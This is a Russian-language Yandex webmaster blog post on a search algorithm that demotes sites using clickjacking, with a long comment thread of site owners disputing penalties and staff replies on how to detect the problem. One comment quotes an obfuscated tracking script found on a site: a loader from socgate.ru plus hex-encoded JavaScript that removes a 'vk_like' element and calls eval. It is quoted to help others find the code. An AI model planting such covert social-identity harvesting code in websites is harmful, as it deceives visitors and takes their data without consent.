Блог Яндекса для вебмастеров

Черный кликджекинг с полным его разоблачением

29 января 2016, 13:14

В декабре 2015 года Яндекс внедрил алгоритм, понижающий в результатах поиска сайты, которые используют технологию кликджекинг. Мы получили много вопросов о том, как работает этот алгоритм, и сегодня хотим подробнее о нем рассказать:

1.    Алгоритм принимает решение на основе анализа данных о сайте, которые он получает в течение ограниченного промежутка времени. Таким образом, срабатывание алгоритма не может быть связано с действиями на сайте, которые производились 2 недели или, тем более, месяц назад - решение принимается только по актуальным данным.

2.    Выявление кликджекинга происходит исключительно по факту его реального использования на сайте, а не по наличию соответствующего неактивного кода. Если сайт использует сторонний сервис с этой технологией, то ограничений стоит опасаться только после активации кода кликджекинга.

На графике ниже можно увидеть, что после анонса ограничений на многих сайтах код кликджекинга был отключен, но затем, увы, вебмастера начали пробовать включать его обратно.

3.    Многие веб-сайты не сами реализуют технологию кликджекинга, а получают ее в составе сторонних сервисов, например по "улучшению продаж". Зачастую вебмастер даже не подозревает, что его сайт использует кликджекинг. Обратите внимание: понижены в результатах поиска будут именно сайты, которые применили кликджекинг, а не сайты сервисов, которые предоставили им данную обманную технику. 

4.    Всего за время работы алгоритма было обнаружено более 15 тысяч сайтов, использовавших кликджекинг, и около 50 сервисов, которые предоставляли такие возможности сайтам клиентов. 

Что нужно учитывать, чтобы не попасть в неприятную ситуацию:

Внимательно относитесь к выбору сервиса, код которого вы планируете разместить на сайте. Особые подозрения должны вызывать:

- идентификация пользователя в социальных сетях;
- предоставление информации, которую пользователь не указывает самостоятельно на вашем сайте;
- звонки пользователю без явного запроса номера телефона и т.п.

Практика показывает, что сервисы, утверждающие, будто они не применяют кликджекинг, на самом деле могут широко использовать его на сайтах своих клиентов. Ниже приведена доля сайтов-клиентов одного из таких сервисов, на которых алгоритмами Яндекса был обнаружен работающий кликджекинг.

 

Если сервис вызывает подозрения, можно воспользоваться инструментами для разработчиков в современных браузерах, чтобы проверить, делает ли сервис обращение к социальным сетям при работе с сайтом.

Если ваш сайт не интегрирован с соцсетями, можно использовать механизм Content Security Policy (CSP), ограничивающий использование сайтом внешних ресурсов. Подробнее об этом механизме читайте на страницах:
o    https://developer.mozilla.org/ru/docs/Web/Security/CSP
o    http://habrahabr.ru/company/yandex/blog/206508/
o    https://en.wikipedia.org/wiki/Content_Security_Policy
o    http://www.html5rocks.com/en/tutorials/security/content-security-policy/

В ближайшее время в сервисе Яндекс.Вебмастер в разделе "Нарушения" появятся предупреждения об использовании технологии кликджекинга на сайтах.

119 комментариев
Подписаться на комментарии к посту
Почему санкции накладываются на все поддомены и основной сайт? http://pr-cy.ru/news/p/5335
А у меня стоит виджет комментариев ВК и он обращается к ВК: q74.queuev4.vk.com/im445

Что же мне его убирать теперь? Людям то удобно так комментировать
mmorpgonline,
https://ru.wikipedia.org/wiki/Кликджекинг
skremet,
Спасибо!
mmorpgonline,
Учитывается то, что сайт осуществляет кликджекинг. Скрипты/виджеты социальных сетей убирать не нужно, если не используют его.
mmorpgonline,
Виджет комментариев можно оставить, думаю :)
И без кликджекинга ваши асессоры явно предвзято относятся к сайтам... Ну не может быть такого, чтобы мой авторский контент с авторскими иллюстрациями по строительной тематике (имею личный опыт в строительстве не менее 15 лет!) был не востребован. Игра на выбивание из ТОП.
Не буду здесь тискать ссылку на сайт, я не из таких. Просто буду вваливать мегатонны реально уникального, авторского контента до тех пор, пока вы не прочистите ряды асессоров, вовсю использующих административный ресурс в личных, корыстных целях. Не думаю, что схему "перекрестной" помощи асессоров друг другу, в улучшении ранжирования личных сайтов, вы не знаете. Знаете прекрасно. Так же все обстоит, как и с системой DMOZ.

В общем, первичный мой вам совет: не доверяйте асессорам, географически и физически находящимся вне РФ, оценивать качества контента сайтов, регионально относящихся к РФ.
Олег Иконников
1 февраля 2016, 10:39
foto-nice,
Имею опыт личного общения с асессором и распоросом про то, как они работают. Ваше сообщение полнейший бред, асессоры не влияют напрямую на выдачу, они лишь корректируют и помогают правильно работать алгоритмам обучения. Исключение - проверка "спамность", возможно она влияет и напрямую на проверяемый сайт/выдачу.
Про перекрестную помощь и ГЕО асессоров - бред параноика.
Относитесь к себе и своему сайту проще, никто не хочет Вам навредить, никто не следит за вами и не понижает в выдаче из-за вредности. Паранойя до добра не доводит.
Олег Иконников,
Вы пишите про параною?
Я лично видел, как сайт начал подниматься в топ1, и как его за 1 день опустили в самый низ. Это сделали алгоритмы или ручная работа асессора? Причем сайт не хуже тех кто в топ сейчас. Вы даже не анализируете какие сайты в топе. Взять к примеру, написали статью, где всех конкурентов облили грязью, а себя выставили самыми лучшими и вы выводите их в топ, так как там портянка текста и много раз написаны ключевые слова про каждого конкурента, это почему то не видят ваши асессоры.
А действительно, официальные коды ВК скажем для настройки рекламы и ретаргетинга тоже попадают по эти санкции?
artis72,
Попадают сайты, которые применяют кликджекинг, а не какие-то определенные скрипты.
safesearch,
Но коды ВК без спроса отправляют ID это не является нарушением?
Олег Иконников
1 февраля 2016, 10:40
artis72,
Кликджекинг - отправление событий, которые по умолчанию требуют согласия пользователя, без этого согласия. Например поставить лайк через невидимое окно, которое "плавает" за мышкой пользователя.
Олег Иконников,
Сбор ID без согласия пользователя это не "левый скрытый клик", но тоже ведь передает данные.
И все-таки, позвольте поинтересоваться вот чем. Сайтов по запросу, который я сейчас представлю, с релевантными страницами во всей сети - не более 1-3, судя по сниппетам результатов в выдаче вашей поисковой системы. Тогда как, объясните мне, мой сайт с 100% релевантной страницей, не находящийся под санкциями ПС Яндекс, не находится по данному запросу даже в ТОП100?!! Аргумент:
3D проект гостевого дома - запрашиваем.

Найдите среди результатов после ТОП3 хоть 1 релевантную страницу, где реально контент сайта/страницы детальнее и корректнее представляет контент страницы с аналогичным запросу содержимым (кстати, 7 суток назад добавлена в "Оригинальные тексты", и тогда же опубликована) - http://www.villostroy.ru/3d-proekt-gostevogo-doma-20x15-metrov-na-5-nomerov.html

У меня внедрен даже 3D-плеер, дополняющий текстовой материал, все - авторская, уникальная, исключительная и кропотливая работа! А вы тут о кликджекинге толкуете...
foto-nice,
К сожалению, ваши комментарии не имеют отношения к теме поста. Если вы считаете, что есть какие-то технические проблемы именно с вашим сайтом, то обратитесь в нашу поддержку, указав в чем именно эти проблемы состоят.
foto-nice,
как страница может оказаться в топе яндекса, если она не проиндексирована яндексом.
Ребят, накидайте ссылок на сервисы, которые используют эти технологии.
http://admeo.ru/ - например вот этот сервис не надо использовать точно!
info@slon33.ru,
socgate.ru, socfish.ru - вот на эти сайты лучше не отправлять статистику
eugene.lyubimov1981
3 февраля 2016, 14:39
mskimpy,
на эти ресурсы официальная инфа о запрете от Яндекса?
info@slon33.ru,
http://socspider.ru, http://socfishing.ru/
за этих со вчерашнего дня пострадал
Буду признателен за официальное пояснение от специалиста Яндекса:

на моём сайте используется скрипт одного из сервисов "отслеживания клиентов" из вконтакте, как, например, http://socspider.ru, http://socfishing.ru/
При посещении страницы посетителем, залогиненым вконтакте, этот скрипт получает ОФИЦИАЛЬНО ОТКРЫТУЮ информацию о его id.
Что позволяет сделать именное спец.предложение на специальном виджете.
При этом, нет ни отправки навязчивых прямых сообщений и пр.
Просто спецпредложение со скидкой с обращением по имени на посещенной странице.

Будет ли это считаться за "кликджекинг"?
(Вики-определение термина читал, но бывают "личные" трактовки. Есть ли они у Яндекса - не знаю)
Алексей,
Если для получения информации используется описываемый метод, то да, это является clickjacking'ом. Со всеми возможными последствиями.
safesearch,
Позвольте тогда еще вопрос:
если ID соцсети VK официально открыт. То, чем почему открытые данные вы считаете, как кликджекинг, а использование кодов ретаргетинга для рекамных кампаний - это норма?
На миллионах сайтов появляются рекламное предложение вроде "Купи со скидкой 10%, введите ваш e-mail".
Отличие виджета с аналогичным предложением только в том, что он обращается к ИМЕНИ посетителя. Пожалуйста, поясните, когда при использовании такого сервиса наступает момент, когда он становится "плохим"?
Когда употребляет имя?
в качестве демонстрации описанного прикрепляю скриншот
https://yadi.sk/i/cnsdWprFoUurs
Заранее спасибо
Алексей,
наказание происходит за clickjacking, неважно где. Эта "технология" всегда считается обманом пользователя. Что тут еще нужно пояснить?

Данные открытые? Ну значит вы можете получать их явным образом, подобный метод для этого не нужен. Или же вы лукавите и все для вас тут очевидно?

Социальные сети предоставляют эту информацию на своем сайте, иногда только свои зарегистрированным пользователям. Приложения и сервисы могут запрашивать доступ к ним через API и, в этом случае, пользователю показывается кто и что хочет о нем узнать, и запрашивается подтверждение.
Сергей СМАРТ
8 февраля 2016, 20:55
safesearch,
Здравствуйте. Подскажите, после полного удаления с сайта кода программы использующей clickjacking ( отслеживала профили в контакте) сайт со временем восстановится в позициях поиска? И если можно примерные сроки. Спасибо.
Сергей СМАРТ,
Если сайт перестает использовать clickjacking, то на ранжировании это перестает сказываться. За дополнительной информацией можно обратиться в поддержку.
safesearch,
У меня есть предложение службе мониторинга нарушений(если таковая существует в Яндексе):
давайте хотя бы 2 дня на исправления после предупреждения, ПОЖАЛУЙСТА!

так же нельзя. Только вчера узнав из вашего блога про то, что сервис вроде socspider.ru - становится запрещенным.
И сегодня, увидев метрику, и зайдя в новую БЕТУ Я.Вебмастера обнаруживаешь, что тебя и предупредили и сразу понизили.

Ну не успели всё убрать, понимаете? Вроде всё убрали, но видимо не успели до конца (товаров тысячи, старались как могли).
Причём обида ситуации в том, что сервисом не пользовались уже последний месяц, т.к. он показал свою бессмысленность. Просто коды еще не успели вычистить из карточек товара.

Так нельзя. Есть предупреждение - есть время реакции. Давайте хотя бы пару дней. Пользователей не спамили, не звонили - только именной виджет с приглашением в группу.
а теперь после нажатия на волшебную кнопку "Я всё сделал" ждать 2 недели.
Алексей,
мы не запрещаем сервисы, мы учитываем информацию о том, что какой-то сайт использует "недружелюбную" по отношению к пользователю методику.

Мы учтем опыт и при включении новых алгоритмов будем сразу предоставлять информацию в Вебмастере. Ну а то, насколько быстрой будет реакция, зависит от самих владельцев сайта.

Про удаление кода сервисов из карточек товаров было интересно прочитать, но современные сайты используют CMS и шаблоны, где подобный код и добавляется (пара исходников или настроек, а не "товаров тысячи").
safesearch,
Ясно, что не раскроете, как же вы "узнали" про то, что хоть как-то что-то было использовано на сайте.
Но уж точно недружелюбного и недовольных от забытого месяц назад на сайте кода уж точно не было.

Чувствую, от вас неверие. Я, если честно, тоже в уважении после произошедшего признаться не стремлюсь.

Ок, хотите подробностей, без проблем:
- в магазине действительно тысячи товаров
- для того, чтобы стимулировать(изначальная идея) покупку дорогих товаров надо было, чтобы человек, пришедший на страницу с товаром не ушел.
- прошлые опыты с модалкой и % скидки за лид результата не дали
- было решено увидеть потребителя вживую(посмотреть кто интересуется на примере профиля вконтакте, чтобы увидеть "лицо" - это можно с помошью socspider.ru или что-то вроде) и в виджете(у socspider.ru он автоматом в интерфейсе есть) обратиться к нему напрямую, "уважительно и по имени"

- а т.к. посещаемость сайта >1000 уников в сутки, то размещать подобный код отслеживания, как код метрики, НА ВСЕ СТРАНИЦЫ САЙТА нет необходимости
- значит на топ 100 дорогих товаров
- затея, как я говорил уже, не сработала
- поэтому затею оставили, а коды есть не просят - не особо и старались, чтобы поудалять - еще 2 месяца проплачено, так что..
safesearch,
Дальше историю вы знаете:
- узнаю пару дней назад про запрет,
- задаю вопрос, а параллельно пытаюсь выкопать список, каким товарам вносился код отслеживания, чтобы его срочно удалить,
- а на следующий день обнаруживаю одновременно "протокол о преступлении" и наказание - падение в выдаче.

Моё отношение - глубоко непозитивное к Яндексу в таком ключе.
Так, повторюсь, нельзя.
Ничего криминального нами сделано не было. Была заинтересованность в исправлении ошибки, раз "Яндекс решил".

И полное непонимание чем была заслужена такая реакция - "бить, как гопник"- "Сигаретки не найдется", а пока лезешь за сигаретами, тебя по башке.
Как-то, простите, не вяжется моё идеализированное представление о Яндексе с озвученным фактом.

PS из-за вашей "компетентной быстроты реакции" на мои вопросы в блоге, 15 человек интернет-магазина были оставлены без заказов. На какой срок модераторам и ассесорам от Яндекс - не в курсе.
Предупредили бы сообщением - исправлено было бы за день.
В новый бета-вебмастер зашел-то случайно, обычно в старом.
А в старом даже сообщений не было!
Короче, safesearch, неприятненькую ситуацию вы моей команде подкинули.
Ни за что.
К сожалению, не нашел в статье четкой инструкции, как эту хрень под названием кликджекинг выявить на сайте (сервисы, программы и т.п). Только общие фразы: "Выявление кликджекинга происходит исключительно по факту его реального использования на сайте.. " А как это выявление происходит?
Обнаружили 15 000 сайтов, выявили 50 сервисов вредных - дайте по ним инфу, вам за это владельцы сайтов будут благодарны..) Но вся инфа под грифом секретно.
А по факту имеем ситуевину, когда без "объявления войны": чета как-то нашли, наказали санкциями, сайт уронили и молчок. А ты сиди, чеши репу и думай: почему число клиентов упало ниже плинтуса, че за хрень происходит с сайтом, откуда прилетело и как устранить.
paulsheff,
Не всегда можно дать четкую инструкцию. Можно еще раз посоветовать несколько способов
- Посмотреть, какие внешние сервисы использует сайт и для чего. Внимательно прочитать про их функции и возможности. Очень часто по этой информации можно найти наиболее вероятного "виновника".
- Использовать средства для разработчиков в браузере, чтобы отследить, какие обращения происходят в внешним сайтам. Есть ли обращения к социальным сетям, для чего и по каким действиям (явным или нет).
- Использовать сниффер, чтобы сделать то же самое, что и в предыдущем пункте, но на уровне сети.
"... в разделе "Нарушения" появятся предупреждения об использовании технологии кликджекинга на сайтах". ))) Как всегда Яндекс поступает красиво. Сначала бан, потом предупреждение.
tride2006,
Теперь это происходит одновременно.
Бред, на нашем сайте нету данной технологии и мы тоже попали под санкции, мы тратим бешеные деньги на рекламу, а ваша техподдержка даже примерно не говорит, что искать хотя бы на сайте... мы не ставили код из каких либо сервисов, скажу даже больше, мы не меняли ничего на сайте, кроме как пагинацию (на странице были все объекты, сделали, чтобы выводились постранично 1,2,3,4, т.к. много объектов было на странице)...
bbestman1987,
Возможно, что код уже давно используется на сайте, но применение clickjacking было обнаружено недавно.

Без рассмотрения конкретного случая сложно оценить справедливость вашего комментария. Конкретный случай рассмотреть можно только обратившись в поддержку.
safesearch,
Я написал Платону, они ничего не сказали кроме: цитирую с добавлением от себя: "Сожалеем, но мы не может указать, где именно у вас нарушения правил, потому что сами не знаем, что мы наделали в алгоритме..." Я просто уже писал в этой теме, не хотелось бы дублировать одни и те же фразы: https://yandex.ru/blog/webmaster/21745/56bb79528582e70818464658?ncrnd=894

В итоге, обидно, что не подсказали (в ваших статьях по конкретики только сторонние сервисы, которые мы 100% не использовали, что искать нам? Указано, что алгоритм бьет только в период установки какого-то кликанджинга, но мы не трогали сайт в это время), что хотя бы искать, тут может быть и какой-то указатель на сайте, так и какой-то просто элемент, который подсказывает где находится объект на сайте, но не коем случае не обман пользователя, допускаю, что в дизайне может с картой городом, но если нет, не уничтожать же сайт, а потом окажется, что какой-то просто сбой был в вашем алгоритме... к примеру...

Я даже рассматривал вариант, что на чужом сайте стоит кликджекинг и он ссылается на нас и из-за этого мы получили санкции, но это бред...
bbestman1987,
Нашел статейку такую learn.javascript.ru/clickjacking

А именно интересует полупрозрачные слои на сайте относятся к Кликджекинг?

Скажем у нас на сайте прозрачные дивы с ссылками на области...
opacity: 0.5;
bbestman1987,
Вы используете на своем сайте сервис, который собирает информацию о пользователе из социальных сетей через clickjacking. Причем это даже самый первый скрипт, который загружает ваш сайт.

Зачем же после этого писать, что "на нашем сайте нету данной технологии", "сторонние сервисы, которые мы 100% не использовали" и т.п.?
safesearch,
приветствую! Можно где-то посмотреть ваш полный перечень сайтов/сервисов, которые так или иначе предоставляют свои услуги клиентам с использованием clickjacking?
safesearch,
Кто вам такое сказал? Выше сайт я привел для примера, т.к. прочитал на нем, варианты, что может попадать под кликджекинг. Смотрите, У нас стоит:
1) "Интеркасса", которая нужна для оплаты пользователя объявлений на сайте для повышения объявлений и вывода объявления в топ. На сколько я знаю, данный сервис не попадает под кликджекинг, т.к. им пользуются многие, поправьте, если я не прав? Интеркасса тоже попадает под кликджекинг?
2) Мы используем соц сети, пользователь может справа нажать на кнопку "соц сети", после чего откроется окно, где он может выбрать интересующую социальную сеть, если он хочет поделиться в друзьями понравившимся объявлением. Как ответили в тех поддержке:
Алгоритм реагирует на сам факт кликджекинга, т.е. сами по себе полупрозрачные слои и кнопки соц.сетей не воспринимаются подобным способом обмана. Рекомендую тщательно проверить все сервисы, используемые на сайте и способы их взаимодействия с данными зашедших на Ваш сайт пользователей.
safesearch,
Сам процесс, пользователи делятся на кто ищет и кто размещает объявления: Кто ищет: заходит на сайт, смотрит нужное объявление в нужном городе, смотрит фотографии, читает описание, звонит по указанным контактным данным, если его всё устраивает.
Кто размещает: Заходит на сайт, регистрируется, подтверждает через е-мейл что он живой пользователь, как и на других сайтах, заходит в личный кабинет, создает объявление, заполняет данные о своём объекте, фотографии загружает с компьютера, сохраняет и объявление на модерацию.

Вроде нету обманов пользователей никаких.

Более у нас нету каких либо скриптов и программист говорит, что не в курсе, что это может быть, как нас быть. Помогите, пожалуйста, мы готовы удалить, что не устраивает на сайте, но т.к. мы понятия не имеем, что искать, а из вне не ставили не какие особо коды из перечисленных в каких-либо статьях ваших и блогеров, техподдержка не подсказывает, что конкретно искать, вопрос так и остается в подвешенном варианте... Мы просто в момент получения фильтра не трогали сайт вообще... Что нам делать? Что искать?
safesearch,
Извиняюсь, что не в одном комментарии, не вмещается:
На сайте, из скриптов, стоит:
1) <script id="data:text/javascript;charset=utf-8;base64,
2) Яндекс метрика
3) Гугл аналититка
4) Скрипты от CMS нашей...

Если вы имели ввиду не мой сайт, а приведенный выше, подскажите, какой скрипт, чтобы другие пользователи тоже знали что искать, приводили конкретные примеры... Давайте наполнять статью реальными примерами, чтобы люди хотя бы знали что искать
bbestman1987,
Мы пишем о сайте, который упоминается в обращении в поддержку.

Есть сомнения, что вы не понимаете, о каком сервисе идет речь. За его использование нужно платить. Вы же не платите "вслепую"?

Что делают перечисляемые вами:
1) <script id="data:text/javascript;charset=utf-8;base64,

и

4) Скрипты от CMS нашей...

?
safesearch,
Спасибо хоть за какую-то подсказку, будем пилить сайт, узнавать, что за первый скрипт. Я не один имею дело с сайтом, наверное программист что-то поставил. Моя зарплата зависит от трафика, потому поверьте мне, если бы я знал о чем идет речь, я бы уже давным давно попросил бы программиста убрать это. С финансами и оплатой дело не имею, потому не в курсе. Теперь дело за программистом, пусть ищет, проверяет скрипты.

Ниже я привел, что сам нашел, т.к. надо было с чего-то начать, чтобы сузить круг поиска проблемы, спасибо большое за помощь, сейчас буду штормить программиста
safesearch,
Мы нашли в чем беда! Ура! Спасибо, что подсказали где искать!
Нас взломали, что ли... Вот вредоносный код, может кому поможет в поисках:
<script type="text/javascript" async="" src="//socgate.ru/strack/?id=9a4c0ed41d8cd9286742925&h=&r=0.020159018575854226">
console.log(1000); var 0x2745=["\x23\x76\x6B\x5F\x6C\x69\x6B\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x72\x65\x6D\x6F\x76\x65"];setTimeout(function(){var 0xa0bex1=document[_0x2745[1]](_0x2745[0]);if(_0xa0bex1){_0xa0bex1[_0x2745[2]]()};},2000);eval(_0x2745); console.log("t4245");
</script>

Статья про это: https://habrahabr.ru/post/238565/
bbestman1987,
То, что вас взломали - крайне маловероятно. Подобный код с clickjacking владельцы сайтов ставят осознанно, причем платят за оказываемый сервис ("идентификацию" и "привлечение" пользователей). Поэтому возникают вопросы, откуда этот код или к чему была вся эта переписка.
safesearch,
safesearch, Здесь, вы правы, код ставило наше руководство (как выяснилось позже), но ничего не сказали нам. Даже после того, как я рассказал про фильтр и из-за чего могли наложить фильтр. Потому, я как глупый человек бился об стену 5-7 дней, не знал, что искать и был на 100% уверен, что это ошибка. Так и живем)

Спасибо, что помогли)
safesearch,
посмотрите, пожалуйста, мой сайт http://heatpsy.narod.ru/ на предмет кликджекинга.
У меня только такие предполагемые варианты:
1. Реклама Гугл Адсенс
2. Виджет группы ВК
3. САм хостинг на Юкозе.

Больше никаких сторонних сервисов нет. Поэтому я теряюсь в догадках и недоуменно смотрю на этот бан от Яндекса.

Как мне перестать использовать кликджекинг, если я не знаю, каким образом он попал ко мне?
bestvasily,
У меня тоже сайт на юкозе(и тоже домен на народе) и тоже под фильтр ушёл, при этом у меня вообще ничего не стоит из выше перечисленного, ломаю голову сижу. В сайт не залазили пару лет вообще, что либо править. Подскажите в каком направление копать?
pestovodom,
в том, что банят весь домен ;) в том и копайте, я так понимаю, что если XXX.ucoz.ru - применяет кликджекинг то и YYY.ucoz.ru получит по шапке
Не знал, что подобное запрещено.
никакое сообщение не получал, стоял подобный скрипт около пару месяцев.

Сегодня все позиции слетели, я так понимаю теперь долго буду ждать свои позиции? А мб и не дождусь?
nikita-buravov2011,
Алгоритм работает и работал всегда по актуальным данным, а не по тому, что было пару месяцев назад. Снятие санкции зависит от того, когда ваш сайт перестанет использовать clickjaсking, если причина в нем.
safesearch,
скрипт убрал сразу же. а что по поводу позиций? Вернуться на свои места? Страницы не пропадут из поиска?
nikita-buravov2011,
Алгоритм влияет только на ранжирование и, когда обнаруживает, что clickjacking не используется, то влияние прекращается.
safesearch,
Извините, еще один вопрос. Когда яндекс проверит мою заявку, при условие, что я устранил проблему - они уберут нарушение в бета вебмастере? И если проблема не устранена они также ответят?
nikita-buravov2011,
Когда система обнаружит, что clickjacking не используется, то в Вебмастере это отразится и на ранжирование влияние пропадет. Если отказ от метода не подтвердится, то сохранится пометка в Вебмастере и влияние.
safesearch,
Я так понял, если кликджекинг будет стоять на сайте, то мне ничего не напишут? Как тогда понять, что его нет на сайте?
nikita-buravov2011,
Если будет обнаружено использование clickjacking'а и применены санкции, то в интерфейсе нового Вебмастера это будет отражено.
История такая, сайт malibu-volgograd.ru попал под санкции по кликджекингу. С сайта все взаимодействие с соц. сетями убрано. В https://beta.webmaster.yandex.ru изменений по нарушениям не происходили как стояло так и стоит нарушение. Сайт вернулся на свои позиции, но снова позиции были понижены. Не могу понять сейчас присутствует или нет использование кликджекинга. И как такое может быть вышел из под санкций и потом снова влетел, ни каких изменений не производилось?
penskoi,
Мы не раскрываем и не комментируем публично (например, в блоге) информацию про конкретные сайты.
Добрый день!
Мой сайт явно попал под данный фильтр, хотя в вебмастере во вкладке "нарушения" данных об этом нет. Как скоро сайт вернется на прежние позиции после того как убрали код.
PVLisn,
Если в нарушениях нет, то почему вы уверены, что причина в этом? Нужно убедиться, что действительно в этом проблема.

P.S. Хотя, clickjacking, похоже у вас использовался, раз вы указали, что убрали код. Хорошо, что убрали.
Здравствуйте, как определить что у меня на сайте завёлся кликджекинг ? Дело в том, что ничего такого я целенаправленно не добавлял на свой сайт, однако от Яндекса такая мера принята, только что сам узнал((
Как найти?? Какой из кодов мог на такое повлиять?
cenbka,
Ответили на ваш аналогичный комментарий к другому посту о clickjacking.
Отличный "подарок" от Яндексойдов. Поставил на сайт скрипт одного из ныне "запрещенных" сервисов, потестил 2 дня, не понравилось, забыл. Прошел год, я о скрипте и не вспоминал, а Яндекс решил, что с 29.01 такие скрипты - ЗЛО. (раньше не были злом, а вот с 29.01 стали...) и молча обрезал весь траф и позы сайта. А обнаружил я это, когда полез смотреть статистику за мес.. И был неприятно удивлен, что сайт уже 2 недели не получает траф и Яндекса... Теперь вот читаю, что Яндексойды заранее знали о всех "запрещенных скриптах", почему было не прислать автоматом уведомления на почту всем вебмастерам, до! ввода фильтра... непонятно.
nemom,
Они всегда были злом, но, к сожалению, мы не сразу обратили на проблему внимание. Для оповещений о проблемах с сайтом есть Вебмастер, вы должны были получить информацию, если им пользуетесь. Если не пользуетесь, то рекомендуем.

Что касается "запрещенных скриптов", то у нас алгоритм обнаруживает использование clickjacking'а и именно на этом основании применяет санкции. Скрипты могут быть установлены, но функция отключена. Поэтому мы не можем утверждать о том, что использование какого-то скрипта приводит к проблеме - это мы определяем по факту обнаружения clickjacking'а.

Хотя, сервисы, которые реализовали возможность сбора данных через clickjacking, нам кажутся весьма сомнительными, мы не готовы создавать публичный список.
safesearch,
"Для оповещений о проблемах с сайтом есть Вебмастер, вы должны были получить информацию, если им пользуетесь. " Вот это самый интересный момент, так как вебмастером я пользуюсь, и никаких уведомлений по этой проблеме я не получал. Поэтому и раздосадован.
nemom,
Напишите, пожалуйста, о своем случае в поддержку, чтобы мы разобрались, нет ли у нас проблемы.
safesearch,
Вы и сейчас баните за то, что не содержит кликджекинга.

Спасибо, поняла.
Как долго сайт будет с заниженными позициями после снятия данного кода?
ckmarketing,
в многих случаях порядка 2 недель
Дорогой Яндекс, могли бы вы отправлять уведомление на почту об использование запрещенных методов, желательно дать время вебмастерам чтобы они могли их устранить, наш сайт попал повторно под фильтр, хотя с тех пор как мы прочитали эту новость, мы сразу удалили его. И мы не сумасшедшие, использовать кликджекинг снова.

Я уверен, тут ошибка алгоритма, в поддержку написал. Мы честно ждали 2 недели снятие фильтра, но теперь то, фильтр наложили ошибочно!
Чтобы уж точно быть уверенными, отправил программисту ссылки на CSP, будем внедрять.
ya.soglasie-ooo,
мы стараемся защитить пользователей, как можно быстрее используя наши знания о том, что сайт выполняет clickjacking. В противном случае, все то время, пока исправляется проблема, пользователи подпадали бы под его действие.
ya.soglasie-ooo
23 мая 2016, 13:08
safesearch,
http://soglasie-ooo.ru в 3 раз попадаем под кликджекинг, хотя убрали еще в первый раз, я вам уже писал что у вас ошибка, но поддержка говорит, это я дурак, я уже отправлял скриншоты с кодом, что отсутствует кликджекинг, недавно прошли модерацию, с того момента ничего, ничего не добавляли на сайт! И сайт снова под фильтром, да сколько можно, вы хоть понимаете какие это убытки для компании, учитывая сколько денег мы так же вкладываем в директ?
ya.soglasie-ooo
23 мая 2016, 13:12
safesearch,
В противном случае, все то время, пока исправляется проблема, пользователи подпадали бы под его действие.


Почему тогда не блокируют объявления в Яндекс.Директе? Сколько лендингов вижу с кликджекингом. 
ya.soglasie-ooo
23 мая 2016, 13:18
ya.soglasie-ooo,
и где скажите мне пожалуйста уведомления, почему не сделать по нормальному? присылать уведомления в сообщениях вебмастера и на почту? почему тогда не уведомлять пользователя в поиске как вирусы? что на сайте возможно используется кликджекинг? ведь фильтр понижает позиции, но пользователи все равно заходят на сайт и подвергаются по вашей логике опасности
ya.soglasie-ooo
23 мая 2016, 13:28
ya.soglasie-ooo,
почему к владельцу бизнеса отношение из-за кликджекинга сразу словно мы бандиты? и не надо говорить что это не так, пользователи тут подтвердят. Большинство кликджекинга на корпоративных сайтах, поставили маркетологи, а предприниматели особо не разбираясь, решили так, это увеличит прибыль? Да, значит ставим. Потом вы объяснили что это плохо, мы поняли, убрали. 


Но почему черт побери, не сделать после первого раза как поймали за руку, снятие фильтра за 1-5 дней? Второй раз поймали, 14 дней, в 3 раз, 30 дней.


Прошу, очень, разберетесь в нашей ситуации. Не надо отмахиваться поддержкой. Вы можете просто по человечески помочь???
ya.soglasie-ooo,
вам по-человечески помогает наша поддержка. Мы не знаем, кто у вас внутри какой код размещает на сайте - вам нужно разобраться самостоятельно, чтобы не допускать подобного рода проблем в будущем. 
ya.soglasie-ooo
24 мая 2016, 09:09
safesearch,
я знаю кто размещает, никто, т.к. доступ закрыл, код удалил, его блять 2 месяца как минимум уже нету, а вы его все видите, как такое может быть, скажите мне. Как может сайт на котором есть кликджекинг пройти модерацию? Если я ничего не делаю кроме того как жму эту кнопку в вебмастере.
ya.soglasie-ooo
24 мая 2016, 09:18
safesearch,
Сергей, спасибо что поддержка сделала крайне человеческую помощь и указана на код, который мы удалили еще в первый раз. Гарантирую что мы пройдем модерацию вообще ничего не делая, как и в предыдущие разы.
ya.soglasie-ooo,
учитывайте, что при повторении обнаружения clickjacking'а время действия санкции алгоритмом продлевается, чтобы убедиться, что это не временное исправление проблемы
ya.soglasie-ooo,
и да, еще в пятницу код, который ранее осуществлял clickjacking на страницах присутствовал, хотя и не работал (ошибка 500). Вообще говоря, не что не мешает вам вернуть его к жизни. Сейчас вроде бы убрали - хорошо.
ya.soglasie-ooo
27 мая 2016, 10:45
safesearch,
"вроде, не что не мешает" к чему эти домыслы. 
ya.soglasie-ooo,
какие домыслы? у вас сохранялся код, который осуществлял clickjacking. Да, сервер отдавал 500, что, обычно, свидетельствует о временной неисправности, но ссылка специально или по недосмотру не была удалена. Как вы думаете, что было бы после того, как сервер начал отдавать код? Обратите внимание, что это было просто дополнительное замечание.
На моём, самом беспонтовом сайте в мире - http://abat.ucoz.ru/, стоял встроенный в шаблон от юкоза, код соцсетей - <a href="https://vimeo.com/" class="soc-vi" target="_blank"></a> <a href="https://twitter.com/" class="soc-tw" target="_blank"></a> <a href="https://www.facebook.com/" class="soc-fc" target="_blank"></a>, я его убрал со всех страниц. Уважаемый Яндекс, поскольку от вашей техподдержки я ответа так и не получил, подскажите хоть в комментарии, этот код являлся признаком наличия кликджекинга ?
x99999,
наличие clickjacking'а определяется по выполнению сайтом определенных действий. Вебмастеру нужно самому разобраться, где располагается код, который это делает.
Кстати нарушение появилось на нашем сайте http://smsbilling.at.ua/ когда я поставил ваш блок с соц кнопками может єто БАГ
Как думаете?
Код взят отсюда https://tech.yandex.ru/share/

вот код
<script type="text/javascript" src="//yastatic.net/es5-shims/0.0.2/es5-shims.min.js" charset="utf-8"></script>
<script type="text/javascript" src="//yastatic.net/share2/share.js" charset="utf-8"></script>
<div class="ya-share2" data-services="vkontakte,facebook,odnoklassniki,moimir,gplus,twitter,viber,whatsapp" data-counter=""></div>
blouse8,
вы ошибаетесь, наши сервисы и код не используют и не использовали clickjacking
safesearch,
Здравствуйте.
Сайт http://pestovodom.narod.ru на хостинге юкоза, обнаружил этот фильтр в панели вебмастера. Сайт ни когда ничего подобного не использовал даже близко, на сайт последнии два года вообще ни каких изменений не происходило и тут резко упали все позиции в Яндексе. Сайт голый хтмл код перенесённый автоматом с народ хостинга на юкоз хостинга, там даже шаблонов нет, ничего вообщем нет.
